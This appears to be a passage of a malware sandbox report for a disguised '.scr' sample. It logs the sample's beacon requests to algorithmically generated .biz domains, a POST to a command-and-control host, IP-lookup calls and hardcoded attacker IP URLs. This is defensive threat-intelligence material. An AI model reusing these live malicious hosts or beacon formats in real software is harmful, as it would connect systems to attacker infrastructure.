                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET /of?usid=20&utid=14164916598 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz
                  Source: global trafficHTTP traffic detected: GET /tbjnflaqienlofab?usid=20&utid=14164917114 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz
                  Source: global trafficHTTP traffic detected: GET /vpav?usid=20&utid=14164923657 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz
                  Source: global trafficHTTP traffic detected: GET /wqgsdflawiqut?usid=20&utid=14164923942 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
                  Source: global trafficHTTP traffic detected: GET /bhikwfegywkkepu?usid=20&utid=14164930459 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz
                  Source: global trafficHTTP traffic detected: GET /ayokafkcxduc?usid=20&utid=14164930640 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
                  Source: global trafficHTTP traffic detected: GET /qdy?usid=20&utid=14164936400 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.fwiwk.biz
                  Source: global trafficHTTP traffic detected: GET /lderrm?usid=20&utid=14164936613 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.fwiwk.biz
                  Source: Microsofts.exe, 0000000E.00000002.640161168.0000000000696000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                  Source: global trafficDNS traffic detected: DNS query: pywolwnvd.biz
                  Source: global trafficDNS traffic detected: DNS query: ssbzmoy.biz
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: cvgrf.biz
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: npukfztj.biz
                  Source: global trafficDNS traffic detected: DNS query: przvgke.biz
                  Source: global trafficDNS traffic detected: DNS query: ww7.przvgke.biz
                  Source: global trafficDNS traffic detected: DNS query: zlenh.biz
                  Source: global trafficDNS traffic detected: DNS query: knjghuig.biz
                  Source: global trafficDNS traffic detected: DNS query: uhxqin.biz
                  Source: global trafficDNS traffic detected: DNS query: anpmnmxo.biz
                  Source: global trafficDNS traffic detected: DNS query: lpuegx.biz
                  Source: global trafficDNS traffic detected: DNS query: ww12.przvgke.biz
                  Source: global trafficDNS traffic detected: DNS query: vjaxhpbji.biz
                  Source: global trafficDNS traffic detected: DNS query: xlfhhhm.biz
                  Source: global trafficDNS traffic detected: DNS query: ifsaia.biz
                  Source: global trafficDNS traffic detected: DNS query: saytjshyf.biz
                  Source: global trafficDNS traffic detected: DNS query: vcddkls.biz
                  Source: global trafficDNS traffic detected: DNS query: fwiwk.biz
                  Source: global trafficDNS traffic detected: DNS query: ww12.fwiwk.biz
                  Source: global trafficDNS traffic detected: DNS query: ww7.fwiwk.biz
                  Source: global trafficDNS traffic detected: DNS query: tbjrpv.biz
                  Source: global trafficDNS traffic detected: DNS query: deoci.biz
                  Source: global trafficDNS traffic detected: DNS query: gytujflc.biz
                  Source: global trafficDNS traffic detected: DNS query: qaynky.biz
                  Source: global trafficDNS traffic detected: DNS query: bumxkqgxu.biz
                  Source: global trafficDNS traffic detected: DNS query: dwrqljrr.biz
                  Source: global trafficDNS traffic detected: DNS query: nqwjmb.biz
                  Source: global trafficDNS traffic detected: DNS query: ytctnunms.biz
                  Source: global trafficDNS traffic detected: DNS query: myups.biz
                  Source: global trafficDNS traffic detected: DNS query: oshhkdluh.biz
                  Source: global trafficDNS traffic detected: DNS query: yunalwv.biz
                  Source: global trafficDNS traffic detected: DNS query: jpskm.biz
                  Source: global trafficDNS traffic detected: DNS query: lrxdmhrr.biz
                  Source: unknownHTTP traffic detected: POST /crs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 808
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Wed, 15 Jan 2025 11:58:54 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Wed, 15 Jan 2025 11:58:55 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Wed, 15 Jan 2025 11:58:55 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Wed, 15 Jan 2025 11:59:01 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Wed, 15 Jan 2025 11:59:01 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: armsvc.exe, 0000000B.00000003.585874459.0000000001480000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.585848853.00000000019E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.exe
                  Source: armsvc.exe, 0000000B.00000002.639468285.00000000006C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://35.164.78.200/
                  Source: PO#_1100015533.scr, 00000008.00000002.387118499.00000000008A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/crs
                  Source: PO#_1100015533.scr, 00000008.00000002.387118499.00000000008A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/crsFLLcp
                  Source: armsvc.exe, 0000000B.00000002.639468285.00000000006E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/rmrhacpx
                  Source: armsvc.exe, 0000000B.00000002.639468285.00000000006E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/rmrhacpxL
                  Source: hVVSnrrP.exe, 00000035.00000002.567934551.0000000000B8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://72.52.178.23/ayokafkcxduc
                  Source: armsvc.exe, 0000000B.00000003.584866410.00000000006A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/savrhhv
                  Source: armsvc.exe, 0000000B.00000003.584866410.00000000006A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/yhhdkvr
                  Source: armsvc.exe, 0000000B.00000003.533723162.0000000001480000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
                  Source: armsvc.exe, 0000000B.00000003.533723162.0000000001480000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
                  Source: Microsofts.exe, 0000000E.00000002.643206935.0000000002710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                  Source: Microsofts.exe, 0000000E.00000002.643206935.0000000002710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.comX
                  Source: Microsofts.exe, 0000000E.00000002.643206935.0000000002704000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000E.00000002.643206935.0000000002710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: Microsofts.exe, 0000000E.00000002.643206935.0000000002691000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: Microsofts.exe, 0000000E.00000002.643206935.0000000002710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/X
                  Source: PO#_1100015533.scr, 00000008.00000002.394485732.0000000003FE7000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000E.00000000.376399398.0000000001272000.00000020.00000001.01000000.0000000C.sdmp, Microsofts.exe.8.drString found in binary or memory: http://checkip.dyndns.org/q
                  Source: Microsofts.exe, 0000000E.00000002.643206935.0000000002710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgX
                  Source: Microsofts.exe, 0000000E.00000002.645305305.0000000005730000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: Microsofts.exe, 0000000E.00000002.640161168.0000000000696000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                  Source: Microsofts.exe, 0000000E.00000002.640161168.0000000000696000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                  Source: Microsofts.exe, 0000000E.00000002.640161168.0000000000696000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                  Source: Microsofts.exe, 0000000E.00000002.645305305.0000000005730000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: Microsofts.exe, 0000000E.00000002.640161168.0000000000696000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                  Source: Microsofts.exe, 0000000E.00000002.640161168.0000000000696000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.403965054.0000000004FFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                  Source: armsvc.exe, 0000000B.00000003.533723162.0000000001480000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                  Source: armsvc.exe, 0000000B.00000003.533723162.0000000001480000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
